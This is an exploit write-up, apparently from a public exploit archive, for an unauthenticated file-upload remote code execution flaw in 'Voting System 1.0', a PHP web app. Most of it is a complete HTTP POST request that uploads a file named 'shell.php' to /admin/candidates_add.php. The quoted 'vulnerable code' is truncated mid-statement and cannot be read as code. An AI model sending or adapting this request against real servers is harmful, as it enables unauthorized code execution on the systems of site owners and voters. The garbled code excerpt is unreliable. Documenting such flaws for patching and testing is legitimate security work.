# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 07/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB

Unauthenticated file upload is possible via /admin/candidates_add.php, which can be used for RCE. The uploaded file is stored under /images/ and is also accessible without authentication.

########################### Vulnerable code ############################

query($sql)){ $_SESSION['success'] = 'Candidate added successfully'; } else{ $_SESSION['error'] = $conn->error; } } else{ $_SESSION['error'] = 'Fill up add form first'; } header('location: candidates.php'); ?>

########################### Payload ############################

POST /admin/candidates_add.php HTTP/1.1
Host: 192.168.1.1
Content-Length: 275
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add"